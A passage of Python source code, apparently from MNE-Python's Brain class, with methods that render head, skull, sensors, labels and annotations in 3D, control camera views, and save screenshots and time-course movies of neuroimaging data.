n_dipoles: raise ValueError(f'The number of colors ({len(colors)}) ' f'and dipoles ({n_dipoles}) must match') colors = [_to_rgb(color, name=f'colors[{ci}]') for ci, color in enumerate(colors)] if scales is None: scales = 5 if self._units == 'mm' else 5e-3 if not isinstance(scales, (list, tuple)): scales = [scales] * n_dipoles # make into list if len(scales) != n_dipoles: raise ValueError(f'The number of scales ({len(scales)}) ' f'and dipoles ({n_dipoles}) must match') pos = apply_trans(head_mri_t, dipole.pos) pos *= 1e3 if self._units == 'mm' else 1 for _ in self._iter_views('vol'): for this_pos, this_ori, color, scale in zip( pos, dipole.ori, colors, scales): actor, _ = self._renderer.quiver3d( *this_pos, *this_ori, color=color, opacity=alpha, mode='arrow', scale=scale, scale_mode='scalar', scalars=[1]) self._add_actor('dipole', actor) self._renderer._update() def remove_dipole(self): """Remove dipole objects from the rendered scene.""" self._remove('dipole', render=True) @fill_doc def add_head(self, dense=True, color='gray', alpha=0.5): """Add a mesh to render the outer head surface. Parameters ---------- dense : bool Whether to plot the dense head (``seghead``) or the less dense head (``head``). %(color_matplotlib)s %(alpha)s Notes ----- .. versionadded:: 0.24 """ # load head surf = _get_head_surface('seghead' if dense else 'head', self._subject_id, self._subjects_dir) verts, triangles = surf['rr'], surf['tris'] verts *= 1e3 if self._units == 'mm' else 1 color = _to_rgb(color) for _ in self._iter_views('vol'): actor, _ = self._renderer.mesh( *verts.T, triangles=triangles, color=color, opacity=alpha, reset_camera=False, render=False) self._add_actor('head', actor) self._renderer._update() def remove_head(self): """Remove head objects from the rendered scene.""" self._remove('head', render=True) @fill_doc def add_skull(self, outer=True, color='gray', alpha=0.5): """Add a mesh to render the skull surface. Parameters ---------- outer : bool Adds the outer skull if ``True``, otherwise adds the inner skull. %(color_matplotlib)s %(alpha)s Notes ----- .. versionadded:: 0.24 """ surf = _get_skull_surface('outer' if outer else 'inner', self._subject_id, self._subjects_dir) verts, triangles = surf['rr'], surf['tris'] verts *= 1e3 if self._units == 'mm' else 1 color = _to_rgb(color) for _ in self._iter_views('vol'): actor, _ = self._renderer.mesh( *verts.T, triangles=triangles, color=color, opacity=alpha, reset_camera=False, render=False) self._add_actor('skull', actor) self._renderer._update() def remove_skull(self): """Remove skull objects from the rendered scene.""" self._remove('skull', render=True) @fill_doc def add_volume_labels(self, aseg='aparc+aseg', labels=None, colors=None, alpha=0.5, smooth=0.9, fill_hole_size=None, legend=None): """Add labels to the rendering from an anatomical segmentation. Parameters ---------- %(aseg)s labels : list Labeled regions of interest to plot. See :func:`mne.get_montage_volume_labels` for one way to determine regions of interest. Regions can also be chosen from the :term:`FreeSurfer LUT`. colors : list | matplotlib-style color | None A list of anything matplotlib accepts: string, RGB, hex, etc. (default :term:`FreeSurfer LUT` colors). %(alpha)s %(smooth)s fill_hole_size : int | None The size of holes to remove in the mesh in voxels. Default is None, no holes are removed. Warning, this dilates the boundaries of the surface by ``fill_hole_size`` number of voxels so use the minimal size. legend : bool | None | dict Add a legend displaying the names of the ``labels``. Default (None) is ``True`` if the number of ``labels`` is 10 or fewer. Can also be a dict of ``kwargs`` to pass to :meth:`pyvista.Plotter.add_legend`. Notes ----- .. versionadded:: 0.24 """ import nibabel as nib # load anatomical segmentation image if not aseg.endswith('aseg'): raise RuntimeError( f'`aseg` file path must end with "aseg", got {aseg}') aseg = _check_fname(op.join(self._subjects_dir, self._subject_id, 'mri', aseg + '.mgz'), overwrite='read', must_exist=True) aseg_fname = aseg aseg = nib.load(aseg_fname) aseg_data = np.asarray(aseg.dataobj) vox_mri_t = aseg.header.get_vox2ras_tkr() mult = 1e-3 if self._units == 'm' else 1 vox_mri_t[:3] *= mult del aseg # read freesurfer lookup table lut, fs_colors = read_freesurfer_lut() if labels is None: # assign default ROI labels based on indices lut_r = {v: k for k, v in lut.items()} labels = [lut_r[idx] for idx in DEFAULTS['volume_label_indices']] _validate_type(fill_hole_size, (int, None), 'fill_hole_size') _validate_type(legend, (bool, None), 'legend') if legend is None: legend = len(labels) < 11 if colors is None: colors = [fs_colors[label] / 255 for label in labels] elif not isinstance(colors, (list, tuple)): colors = [colors] * len(labels) # make into list colors = [_to_rgb(color, name=f'colors[{ci}]') for ci, color in enumerate(colors)] surfs = _marching_cubes( aseg_data, [lut[label] for label in labels], smooth=smooth, fill_hole_size=fill_hole_size) for label, color, (verts, triangles) in zip(labels, colors, surfs): if len(verts) == 0: # not in aseg vals warn(f'Value {lut[label]} not found for label ' f'{repr(label)} in: {aseg_fname}') continue verts = apply_trans(vox_mri_t, verts) for _ in self._iter_views('vol'): actor, _ = self._renderer.mesh( *verts.T, triangles=triangles, color=color, opacity=alpha, reset_camera=False, render=False) self._add_actor('volume_labels', actor) if legend or isinstance(legend, dict): # use empty kwargs for legend = True legend = legend if isinstance(legend, dict) else dict() self._renderer.plotter.add_legend( list(zip(labels, colors)), **legend) self._renderer._update() def remove_volume_labels(self): """Remove the volume labels from the rendered scene.""" self._remove('volume_labels', render=True) self._renderer.plotter.remove_legend() @fill_doc def add_foci(self, coords, coords_as_verts=False, map_surface=None, scale_factor=1, color="white", alpha=1, name=None, hemi=None, resolution=50): """Add spherical foci, possibly mapping to displayed surf. The foci spheres can be displayed at the coordinates given, or mapped through a surface geometry. In other words, coordinates from a volume-based analysis in MNI space can be displayed on an inflated average surface by finding the closest vertex on the white surface and mapping to that vertex on the inflated mesh. Parameters ---------- coords : ndarray, shape (n_coords, 3) Coordinates in stereotaxic space (default) or array of vertex ids (with ``coord_as_verts=True``). coords_as_verts : bool Whether the coords parameter should be interpreted as vertex ids. map_surface : str | None Surface to project the coordinates to, or None to use raw coords. When set to a surface, each foci is positioned at the closest vertex in the mesh. scale_factor : float Controls the size of the foci spheres (relative to 1cm). %(color_matplotlib)s %(alpha)s Default is 1. name : str Internal name to use. hemi : str | None If None, it is assumed to belong to the hemipshere being shown. If two hemispheres are being shown, an error will be thrown. resolution : int The resolution of the spheres. """ hemi = self._check_hemi(hemi, extras=['vol']) # Figure out how to interpret the first parameter if coords_as_verts: coords = self.geo[hemi].coords[coords] map_surface = None # Possibly map the foci coords through a surface if map_surface is not None: from scipy.spatial.distance import cdist foci_surf = _Surface(self._subject_id, hemi, map_surface, self._subjects_dir, offset=0, units=self._units, x_dir=self._rigid[0, :3]) foci_surf.load_geometry() foci_vtxs = np.argmin(cdist(foci_surf.coords, coords), axis=0) coords = self.geo[hemi].coords[foci_vtxs] # Convert the color code color = _to_rgb(color) if self._units == 'm': scale_factor = scale_factor / 1000. for _, _, v in self._iter_views(hemi): self._renderer.sphere(center=coords, color=color, scale=(10. * scale_factor), opacity=alpha, resolution=resolution) self._renderer.set_camera(**views_dicts[hemi][v]) # Store the foci in the Brain._data dictionary data_foci = coords if 'foci' in self._data.get(hemi, []): data_foci = np.vstack((self._data[hemi]['foci'], data_foci)) self._data[hemi] = self._data.get(hemi, dict()) # no data added yet self._data[hemi]['foci'] = data_foci @verbose def add_sensors(self, info, trans, meg=None, eeg='original', fnirs=True, ecog=True, seeg=True, dbs=True, verbose=None): """Add mesh objects to represent sensor positions. Parameters ---------- %(info_not_none)s %(trans_not_none)s %(meg)s %(eeg)s %(fnirs)s %(ecog)s %(seeg)s %(dbs)s %(verbose)s Notes ----- .. versionadded:: 0.24 """ _validate_type(info, Info, 'info') meg, eeg, fnirs, warn_meg = _handle_sensor_types(meg, eeg, fnirs) picks = pick_types(info, meg=('sensors' in meg), ref_meg=('ref' in meg), eeg=(len(eeg) > 0), ecog=ecog, seeg=seeg, dbs=dbs, fnirs=(len(fnirs) > 0)) head_mri_t = _get_trans(trans, 'head', 'mri', allow_none=False)[0] del trans # get transforms to "mri"window to_cf_t = _get_transforms_to_coord_frame( info, head_mri_t, coord_frame='mri') if pick_types(info, eeg=True, exclude=()).size > 0 and \ 'projected' in eeg: head_surf = _get_head_surface( 'seghead', self._subject_id, self._subjects_dir) else: head_surf = None # Do the main plotting for _ in self._iter_views('vol'): if picks.size > 0: sensors_actors = _plot_sensors( self._renderer, info, to_cf_t, picks, meg, eeg, fnirs, warn_meg, head_surf, self._units) for item, actors in sensors_actors.items(): for actor in actors: self._add_actor(item, actor) if 'helmet' in meg and pick_types(info, meg=True).size > 0: surf = get_meg_helmet_surf(info, head_mri_t) verts = surf['rr'] * (1 if self._units == 'm' else 1e3) actor, _ = self._renderer.mesh( *verts.T, surf['tris'], color=DEFAULTS['coreg']['helmet_color'], opacity=0.25, reset_camera=False, render=False) self._add_actor('helmet', actor) self._renderer._update() def remove_sensors(self, kind=None): """Remove sensors from the rendered scene. Parameters ---------- kind : str | list | None If None, removes all sensor-related data including the helmet. Can be "meg", "eeg", "fnirs", "ecog", "seeg", "dbs" or "helmet" to remove that item. """ all_kinds = ('meg', 'eeg', 'fnirs', 'ecog', 'seeg', 'dbs', 'helmet') if kind is None: for item in all_kinds: self._remove(item, render=False) else: if isinstance(kind, str): kind = [kind] for this_kind in kind: _check_option('kind', this_kind, all_kinds) self._remove(this_kind, render=False) self._renderer._update() def add_text(self, x, y, text, name=None, color=None, opacity=1.0, row=0, col=0, font_size=None, justification=None): """Add a text to the visualization. Parameters ---------- x : float X coordinate. y : float Y coordinate. text : str Text to add. name : str Name of the text (text label can be updated using update_text()). color : tuple Color of the text. Default is the foreground color set during initialization (default is black or white depending on the background color). opacity : float Opacity of the text (default 1.0). row : int | None Row index of which brain to use. Default is the top row. col : int | None Column index of which brain to use. Default is the left-most column. font_size : float | None The font size to use. justification : str | None The text justification. """ _validate_type(name, (str, None), 'name') name = text if name is None else name if 'text' in self._actors and name in self._actors['text']: raise ValueError(f'Text with the name {name} already exists') for ri, ci, _ in self._iter_views('vol'): if (row is None or row == ri) and (col is None or col == ci): actor = self._renderer.text2d( x_window=x, y_window=y, text=text, color=color, size=font_size, justification=justification) if 'text' not in self._actors: self._actors['text'] = dict() self._actors['text'][name] = actor def remove_text(self, name=None): """Remove text from the rendered scene. Parameters ---------- name : str | None Remove specific text by name. If None, all text will be removed. """ _validate_type(name, (str, None), 'name') if name is None: for actor in self._actors['text'].values(): self._renderer.plotter.remove_actor(actor) self._actors.pop('text') else: names = [None] if 'text' in self._actors: names += list(self._actors['text'].keys()) _check_option('name', name, names) self._renderer.plotter.remove_actor( self._actors['text'][name]) self._actors['text'].pop(name) self._renderer._update() def _configure_label_time_course(self): from ...label import read_labels_from_annot if not self.show_traces: return if self.mpl_canvas is None: self._configure_mplcanvas() else: self.clear_glyphs() self.traces_mode = 'label' self.add_annotation(self.annot, color="w", alpha=0.75) # now plot the time line self.plot_time_line(update=False) self.mpl_canvas.update_plot() for hemi in self._hemis: labels = read_labels_from_annot( subject=self._subject_id, parc=self.annot, hemi=hemi, subjects_dir=self._subjects_dir ) self._vertex_to_label_id[hemi] = np.full( self.geo[hemi].coords.shape[0], -1) self._annotation_labels[hemi] = labels for idx, label in enumerate(labels): self._vertex_to_label_id[hemi][label.vertices] = idx @fill_doc def add_annotation(self, annot, borders=True, alpha=1, hemi=None, remove_existing=True, color=None): """Add an annotation file. Parameters ---------- annot : str | tuple Either path to annotation file or annotation name. Alternatively, the annotation can be specified as a ``(labels, ctab)`` tuple per hemisphere, i.e. ``annot=(labels, ctab)`` for a single hemisphere or ``annot=((lh_labels, lh_ctab), (rh_labels, rh_ctab))`` for both hemispheres. ``labels`` and ``ctab`` should be arrays as returned by :func:`nibabel.freesurfer.io.read_annot`. borders : bool | int Show only label borders. If int, specify the number of steps (away from the true border) along the cortical mesh to include as part of the border definition. %(alpha)s Default is 1. hemi : str | None If None, it is assumed to belong to the hemipshere being shown. If two hemispheres are being shown, data must exist for both hemispheres. remove_existing : bool If True (default), remove old annotations. color : matplotlib-style color code If used, show all annotations in the same (specified) color. Probably useful only when showing annotation borders. """ from ...label import _read_annot hemis = self._check_hemis(hemi) # Figure out where the data is coming from if isinstance(annot, str): if os.path.isfile(annot): filepath = annot path = os.path.split(filepath)[0] file_hemi, annot = os.path.basename(filepath).split('.')[:2] if len(hemis) > 1: if annot[:2] == 'lh.': filepaths = [filepath, op.join(path, 'rh' + annot[2:])] elif annot[:2] == 'rh.': filepaths = [op.join(path, 'lh' + annot[2:], filepath)] else: raise RuntimeError('To add both hemispheres ' 'simultaneously, filename must ' 'begin with "lh." or "rh."') else: filepaths = [filepath] else: filepaths = [] for hemi in hemis: filepath = op.join(self._subjects_dir, self._subject_id, 'label', ".".join([hemi, annot, 'annot'])) if not os.path.exists(filepath): raise ValueError('Annotation file %s does not exist' % filepath) filepaths += [filepath] annots = [] for hemi, filepath in zip(hemis, filepaths): # Read in the data labels, cmap, _ = _read_annot(filepath) annots.append((labels, cmap)) else: annots = [annot] if len(hemis) == 1 else annot annot = 'annotation' for hemi, (labels, cmap) in zip(hemis, annots): # Maybe zero-out the non-border vertices self._to_borders(labels, hemi, borders) # Handle null labels properly cmap[:, 3] = 255 bgcolor = np.round(np.array(self._brain_color) * 255).astype(int) bgcolor[-1] = 0 cmap[cmap[:, 4] < 0, 4] += 2 ** 24 # wrap to positive cmap[cmap[:, 4] <= 0, :4] = bgcolor if np.any(labels == 0) and not np.any(cmap[:, -1] <= 0): cmap = np.vstack((cmap, np.concatenate([bgcolor, [0]]))) # Set label ids sensibly order = np.argsort(cmap[:, -1]) cmap = cmap[order] ids = np.searchsorted(cmap[:, -1], labels) cmap = cmap[:, :4] # Set the alpha level alpha_vec = cmap[:, 3] alpha_vec[alpha_vec > 0] = alpha * 255 # Override the cmap when a single color is used if color is not None: rgb = np.round(np.multiply(_to_rgb(color), 255)) cmap[:, :3] = rgb.astype(cmap.dtype) ctable = cmap.astype(np.float64) for _ in self._iter_views(hemi): mesh = self._layered_meshes[hemi] mesh.add_overlay( scalars=ids, colormap=ctable, rng=[np.min(ids), np.max(ids)], opacity=alpha, name=annot, ) self._annots[hemi].append(annot) if not self.time_viewer or self.traces_mode == 'vertex': self._renderer._set_colormap_range( mesh._actor, cmap.astype(np.uint8), None) self._renderer._update() def close(self): """Close all figures and cleanup data structure.""" self._closed = True self._renderer.close() def show(self): """Display the window.""" from ..backends._utils import _qt_app_exec self._renderer.show() if self._block: _qt_app_exec(self._renderer.figure.store["app"]) @fill_doc def show_view(self, view=None, roll=None, distance=None, *, row=None, col=None, hemi=None, align=True, azimuth=None, elevation=None, focalpoint=None): """Orient camera to display view. Parameters ---------- %(view)s %(roll)s %(distance)s row : int | None The row to set. Default all rows. col : int | None The column to set. Default all columns. hemi : str | None Which hemi to use for view lookup (when in "both" mode). align : bool If True, consider view arguments relative to canonical MRI directions (closest to MNI for the subject) rather than native MRI space. This helps when MRIs are not in standard orientation (e.g., have large rotations). %(azimuth)s %(elevation)s %(focalpoint)s Notes ----- The builtin string views are the following perspectives, based on the :term:`RAS` convention. If not otherwise noted, the view will have the top of the brain (superior, +Z) in 3D space shown upward in the 2D perspective: ``'lateral'`` From the left or right side such that the lateral (outside) surface of the given hemisphere is visible. ``'medial'`` From the left or right side such that the medial (inside) surface of the given hemisphere is visible (at least when in split or single-hemi mode). ``'rostral'`` From the front. ``'caudal'`` From the rear. ``'dorsal'`` From above, with the front of the brain pointing up. ``'ventral'`` From below, with the front of the brain pointing up. ``'frontal'`` From the front and slightly lateral, with the brain slightly tilted forward (yielding a view from slightly above). ``'parietal'`` From the rear and slightly lateral, with the brain slightly tilted backward (yielding a view from slightly above). ``'axial'`` From above with the brain pointing up (same as ``'dorsal'``). ``'sagittal'`` From the right side. ``'coronal'`` From the rear. Three letter abbreviations (e.g., ``'lat'``) of all of the above are also supported. """ _validate_type(row, ('int-like', None), 'row') _validate_type(col, ('int-like', None), 'col') hemi = self._hemi if hemi is None else hemi if hemi == 'split': if (self._view_layout == 'vertical' and col == 1 or self._view_layout == 'horizontal' and row == 1): hemi = 'rh' else: hemi = 'lh' _validate_type(view, (str, None), 'view') view_params = dict(azimuth=azimuth, elevation=elevation, roll=roll, distance=distance, focalpoint=focalpoint) if view is not None: # view_params take precedence view_params = {param: val for param, val in view_params.items() if val is not None} # no overwriting with None view_params = dict(views_dicts[hemi].get(view), **view_params) xfm = self._rigid if align else None for h in self._hemis: for ri, ci, _ in self._iter_views(h): if (row is None or row == ri) and (col is None or col == ci): self._renderer.set_camera( **view_params, reset_camera=False, rigid=xfm) self._renderer._update() def reset_view(self): """Reset the camera.""" for h in self._hemis: for _, _, v in self._iter_views(h): self._renderer.set_camera(**views_dicts[h][v], reset_camera=False) def save_image(self, filename=None, mode='rgb'): """Save view from all panels to disk. Parameters ---------- filename : str Path to new image file. mode : str Either 'rgb' or 'rgba' for values to return. """ if filename is None: filename = _generate_default_filename(".png") _save_ndarray_img( filename, self.screenshot(mode=mode, time_viewer=True)) @fill_doc def screenshot(self, mode='rgb', time_viewer=False): """Generate a screenshot of current view. Parameters ---------- mode : str Either 'rgb' or 'rgba' for values to return. %(brain_screenshot_time_viewer)s Returns ------- screenshot : array Image pixel values. """ n_channels = 3 if mode == 'rgb' else 4 img = self._renderer.screenshot(mode) logger.debug(f'Got screenshot of size {img.shape}') if time_viewer and self.time_viewer and \ self.show_traces and \ not self.separate_canvas: from matplotlib.image import imread canvas = self.mpl_canvas.fig.canvas canvas.draw_idle() fig = self.mpl_canvas.fig with BytesIO() as output: # Need to pass dpi here so it uses the physical (HiDPI) DPI # rather than logical DPI when saving in most cases. # But when matplotlib uses HiDPI and VTK doesn't # (e.g., macOS w/Qt 5.14+ and VTK9) then things won't work, # so let's just calculate the DPI we need to get # the correct size output based on the widths being equal size_in = fig.get_size_inches() dpi = fig.get_dpi() want_size = tuple(x * dpi for x in size_in) n_pix = want_size[0] * want_size[1] logger.debug( f'Saving figure of size {size_in} @ {dpi} DPI ' f'({want_size} = {n_pix} pixels)') # Sometimes there can be off-by-one errors here (e.g., # if in mpl int() rather than int(round()) is used to # compute the number of pixels) so rather than use "raw" # format and try to reshape ourselves, just write to PNG # and read it, which has the dimensions encoded for us. fig.savefig(output, dpi=dpi, format='png', facecolor=self._bg_color, edgecolor='none') output.seek(0) trace_img = imread(output, format='png')[:, :, :n_channels] trace_img = np.clip( np.round(trace_img * 255), 0, 255).astype(np.uint8) bgcolor = np.array(self._brain_color[:n_channels]) / 255 img = concatenate_images([img, trace_img], bgcolor=bgcolor, n_channels=n_channels) return img @contextlib.contextmanager def _no_lut_update(self, why): orig = self._lut_locked self._lut_locked = why try: yield finally: self._lut_locked = orig @fill_doc def update_lut(self, fmin=None, fmid=None, fmax=None, alpha=None): """Update color map. Parameters ---------- %(fmin_fmid_fmax)s %(alpha)s """ args = f'{fmin}, {fmid}, {fmax}, {alpha}' if self._lut_locked is not None: logger.debug(f'LUT update postponed with {args}') return logger.debug(f'Updating LUT with {args}') center = self._data['center'] colormap = self._data['colormap'] transparent = self._data['transparent'] lims = {key: self._data[key] for key in ('fmin', 'fmid', 'fmax')} _update_monotonic(lims, fmin=fmin, fmid=fmid, fmax=fmax) assert all(val is not None for val in lims.values()) self._data.update(lims) self._data['ctable'] = np.round( calculate_lut(colormap, alpha=1., center=center, transparent=transparent, **lims) * 255).astype(np.uint8) # update our values rng = self._cmap_range ctable = self._data['ctable'] for hemi in ['lh', 'rh', 'vol']: hemi_data = self._data.get(hemi) if hemi_data is not None: if hemi in self._layered_meshes: mesh = self._layered_meshes[hemi] mesh.update_overlay(name='data', colormap=self._data['ctable'], opacity=alpha, rng=rng) self._renderer._set_colormap_range( mesh._actor, ctable, self._scalar_bar, rng, self._brain_color) grid_volume_pos = hemi_data.get('grid_volume_pos') grid_volume_neg = hemi_data.get('grid_volume_neg') for grid_volume in (grid_volume_pos, grid_volume_neg): if grid_volume is not None: self._renderer._set_volume_range( grid_volume, ctable, hemi_data['alpha'], self._scalar_bar, rng) glyph_actor = hemi_data.get('glyph_actor') if glyph_actor is not None: for glyph_actor_ in glyph_actor: self._renderer._set_colormap_range( glyph_actor_, ctable, self._scalar_bar, rng) if self.time_viewer: with self._no_lut_update(f'update_lut {args}'): for key in ('fmin', 'fmid', 'fmax'): self.callbacks[key](lims[key]) self._renderer._update() def set_data_smoothing(self, n_steps): """Set the number of smoothing steps. Parameters ---------- n_steps : int Number of smoothing steps. """ from ...morph import _hemi_morph for hemi in ['lh', 'rh']: hemi_data = self._data.get(hemi) if hemi_data is not None: if len(hemi_data['array']) >= self.geo[hemi].x.shape[0]: continue vertices = hemi_data['vertices'] if vertices is None: raise ValueError( 'len(data) < nvtx (%s < %s): the vertices ' 'parameter must not be None' % (len(hemi_data), self.geo[hemi].x.shape[0])) morph_n_steps = 'nearest' if n_steps == -1 else n_steps with use_log_level(False): smooth_mat = _hemi_morph( self.geo[hemi].orig_faces, np.arange(len(self.geo[hemi].coords)), vertices, morph_n_steps, maps=None, warn=False) self._data[hemi]['smooth_mat'] = smooth_mat self.set_time_point(self._data['time_idx']) self._data['smoothing_steps'] = n_steps @property def _n_times(self): return len(self._times) if self._times is not None else None @property def time_interpolation(self): """The interpolation mode.""" return self._time_interpolation @fill_doc def set_time_interpolation(self, interpolation): """Set the interpolation mode. Parameters ---------- %(brain_time_interpolation)s """ self._time_interpolation = _check_option( 'interpolation', interpolation, ('linear', 'nearest', 'zero', 'slinear', 'quadratic', 'cubic') ) self._time_interp_funcs = dict() self._time_interp_inv = None if self._times is not None: idx = np.arange(self._n_times) for hemi in ['lh', 'rh', 'vol']: hemi_data = self._data.get(hemi) if hemi_data is not None: array = hemi_data['array'] self._time_interp_funcs[hemi] = _safe_interp1d( idx, array, self._time_interpolation, axis=-1, assume_sorted=True) self._time_interp_inv = _safe_interp1d(idx, self._times) def set_time_point(self, time_idx): """Set the time point shown (can be a float to interpolate). Parameters ---------- time_idx : int | float The time index to use. Can be a float to use interpolation between indices. """ self._current_act_data = dict() time_actor = self._data.get('time_actor', None) time_label = self._data.get('time_label', None) for hemi in ['lh', 'rh', 'vol']: hemi_data = self._data.get(hemi) if hemi_data is not None: array = hemi_data['array'] # interpolate in time vectors = None if array.ndim == 1: act_data = array self._current_time = 0 else: act_data = self._time_interp_funcs[hemi](time_idx) self._current_time = self._time_interp_inv(time_idx) if array.ndim == 3: vectors = act_data act_data = np.linalg.norm(act_data, axis=1) self._current_time = self._time_interp_inv(time_idx) self._current_act_data[hemi] = act_data if time_actor is not None and time_label is not None: time_actor.SetInput(time_label(self._current_time)) # update the volume interpolation grid = hemi_data.get('grid') if grid is not None: vertices = self._data['vol']['vertices'] values = self._current_act_data['vol'] rng = self._cmap_range fill = 0 if self._data['center'] is not None else rng[0] _cell_data(grid)['values'].fill(fill) # XXX for sided data, we probably actually need two # volumes as composite/MIP needs to look at two # extremes... for now just use abs. Eventually we can add # two volumes if we want. _cell_data(grid)['values'][vertices] = values # interpolate in space smooth_mat = hemi_data.get('smooth_mat') if smooth_mat is not None: act_data = smooth_mat.dot(act_data) # update the mesh scalar values if hemi in self._layered_meshes: mesh = self._layered_meshes[hemi] if 'data' in mesh._overlays: mesh.update_overlay(name='data', scalars=act_data) else: mesh.add_overlay( scalars=act_data, colormap=self._data['ctable'], rng=self._cmap_range, opacity=None, name='data', ) # update the glyphs if vectors is not None: self._update_glyphs(hemi, vectors) self._data['time_idx'] = time_idx self._renderer._update() def set_time(self, time): """Set the time to display (in seconds). Parameters ---------- time : float The time to show, in seconds. """ if self._times is None: raise ValueError( 'Cannot set time when brain has no defined times.') elif min(self._times) <= time <= max(self._times): self.set_time_point(np.interp(float(time), self._times, np.arange(self._n_times))) else: raise ValueError( f'Requested time ({time} s) is outside the range of ' f'available times ({min(self._times)}-{max(self._times)} s).') def _update_glyphs(self, hemi, vectors): hemi_data = self._data.get(hemi) assert hemi_data is not None vertices = hemi_data['vertices'] vector_alpha = self._data['vector_alpha'] scale_factor = self._data['scale_factor'] vertices = slice(None) if vertices is None else vertices x, y, z = np.array(self.geo[hemi].coords)[vertices].T if hemi_data['glyph_actor'] is None: add = True hemi_data['glyph_actor'] = list() else: add = False count = 0 for _ in self._iter_views(hemi): if hemi_data['glyph_dataset'] is None: glyph_mapper, glyph_dataset = self._renderer.quiver3d( x, y, z, vectors[:, 0], vectors[:, 1], vectors[:, 2], color=None, mode='2darrow', scale_mode='vector', scale=scale_factor, opacity=vector_alpha, name=str(hemi) + "_glyph" ) hemi_data['glyph_dataset'] = glyph_dataset hemi_data['glyph_mapper'] = glyph_mapper else: glyph_dataset = hemi_data['glyph_dataset'] _point_data(glyph_dataset)['vec'] = vectors glyph_mapper = hemi_data['glyph_mapper'] if add: glyph_actor = self._renderer._actor(glyph_mapper) prop = glyph_actor.GetProperty() prop.SetLineWidth(2.) prop.SetOpacity(vector_alpha) self._renderer.plotter.add_actor(glyph_actor, render=False) hemi_data['glyph_actor'].append(glyph_actor) else: glyph_actor = hemi_data['glyph_actor'][count] count += 1 self._renderer._set_colormap_range( actor=glyph_actor, ctable=self._data['ctable'], scalar_bar=None, rng=self._cmap_range, ) @property def _cmap_range(self): dt_max = self._data['fmax'] if self._data['center'] is None: dt_min = self._data['fmin'] else: dt_min = -1 * dt_max rng = [dt_min, dt_max] return rng def _update_fscale(self, fscale): """Scale the colorbar points.""" fmin = self._data['fmin'] * fscale fmid = self._data['fmid'] * fscale fmax = self._data['fmax'] * fscale self.update_lut(fmin=fmin, fmid=fmid, fmax=fmax) def _update_auto_scaling(self, restore=False): user_clim = self._data['clim'] if user_clim is not None and 'lims' in user_clim: allow_pos_lims = False else: allow_pos_lims = True if user_clim is not None and restore: clim = user_clim else: clim = 'auto' colormap = self._data['colormap'] transparent = self._data['transparent'] mapdata = _process_clim( clim, colormap, transparent, np.concatenate(list(self._current_act_data.values())), allow_pos_lims) diverging = 'pos_lims' in mapdata['clim'] colormap = mapdata['colormap'] scale_pts = mapdata['clim']['pos_lims' if diverging else 'lims'] transparent = mapdata['transparent'] del mapdata fmin, fmid, fmax = scale_pts center = 0. if diverging else None self._data['center'] = center self._data['colormap'] = colormap self._data['transparent'] = transparent self.update_lut(fmin=fmin, fmid=fmid, fmax=fmax) def _to_time_index(self, value): """Return the interpolated time index of the given time value.""" time = self._data['time'] value = np.interp(value, time, np.arange(len(time))) return value @property def data(self): """Data used by time viewer and color bar widgets.""" return self._data @property def labels(self): return self._labels @property def views(self): return self._views @property def hemis(self): return self._hemis def _save_movie(self, filename, time_dilation=4., tmin=None, tmax=None, framerate=24, interpolation=None, codec=None, bitrate=None, callback=None, time_viewer=False, **kwargs): import imageio with self._renderer._disabled_interaction(): images = self._make_movie_frames( time_dilation, tmin, tmax, framerate, interpolation, callback, time_viewer) # find imageio FFMPEG parameters if 'fps' not in kwargs: kwargs['fps'] = framerate if codec is not None: kwargs['codec'] = codec if bitrate is not None: kwargs['bitrate'] = bitrate imageio.mimwrite(filename, images, **kwargs) def _save_movie_tv(self, filename, time_dilation=4., tmin=None, tmax=None, framerate=24, interpolation=None, codec=None, bitrate=None, callback=None, time_viewer=False, **kwargs): def frame_callback(frame, n_frames): if frame == n_frames: # On the ImageIO step self.status_msg.set_value( "Saving with ImageIO: %s" % filename ) self.status_msg.show() self.status_progress.hide() self._renderer._status_bar_update() else: self.status_msg.set_value( "Rendering images (frame %d / %d) ..." % (frame + 1, n_frames) ) self.status_msg.show() self.status_progress.show() self.status_progress.set_range([0, n_frames - 1]) self.status_progress.set_value(frame) self.status_progress.update() self.status_msg.update() self._renderer._status_bar_update() # set cursor to busy default_cursor = self._renderer._window_get_cursor() self._renderer._window_set_cursor( self._renderer._window_new_cursor("WaitCursor")) try: self._save_movie(filename, time_dilation, tmin, tmax, framerate, interpolation, codec, bitrate, frame_callback, time_viewer, **kwargs) except (Exception, KeyboardInterrupt): warn('Movie saving aborted:\n' + traceback.format_exc()) finally: self._renderer._window_set_cursor(default_cursor) @fill_doc def save_movie(self, filename=None, time_dilation=4., tmin=None, tmax=None, framerate=24, interpolation=None, codec=None, bitrate=None, callback=None, time_viewer=False, **kwargs): """Save a movie (for data with a time axis). The movie is created through the :mod:`imageio` module. The format is determined by the extension, and additional options can be specified through keyword arguments that depend on the format, see :doc:`imageio's format page <imageio:formats/index>`. .. Warning:: This method assumes that time is specified in seconds when adding data. If time is specified in milliseconds this will result in movies 1000 times longer than expected. Parameters ---------- filename : str Path at which to save the movie. The extension determines the format (e.g., ``'*.mov'``, ``'*.gif'``, ...; see the :mod:`imageio` documentation for available formats). time_dilation : float Factor by which to stretch time (default 4). For example, an epoch from -100 to 600 ms lasts 700 ms. With ``time_dilation=4`` this would result in a 2.8 s long movie. tmin : float First time point to include (default: all data). tmax : float Last time point to include (default: all data). framerate : float Framerate of the movie (frames per second, default 24). %(brain_time_interpolation)s If None, it uses the current ``brain.interpolation``, which defaults to ``'nearest'``. Defaults to None. codec : str | None The codec to use. bitrate : float | None The bitrate to use. callback : callable | None A function to call on each iteration. Useful for status message updates. It will be passed keyword arguments ``frame`` and ``n_frames``. %(brain_screenshot_time_viewer)s **kwargs : dict Specify additional options for :mod:`imageio`. """ if filename is None: filename = _generate_default_filename(".mp4") func = self._save_movie_tv if self.time_viewer else self._save_movie func(filename, time_dilation, tmin, tmax, framerate, interpolation, codec, bitrate, callback, time_viewer, **kwargs) def _make_movie_frames(self, time_dilation, tmin, tmax, framerate, interpolation, callback, time_viewer): from math import floor # find tmin if tmin is None: tmin = self._times[0] elif tmin < self._times[0]: raise ValueError("tmin=%r is smaller than the first time point " "(%r)" % (tmin, self._times[0])) # find indexes at which to create frames if tmax is None: tmax = self._times[-1] elif tmax > self._times[-1]: raise ValueError("tmax=%r is greater than the latest time point " "(%r)" % (tmax, self._times[-1])) n_frames = floor((tmax - tmin) * time_dilation * framerate) times = np.arange(n_frames, dtype=float) times /= framerate * time_dilation times += tmin time_idx = np.interp(times, self._times, np.arange(self._n_times)) n_times = len(time_idx) if n_times == 0: raise ValueError("No time points selected") logger.debug("Save movie for time 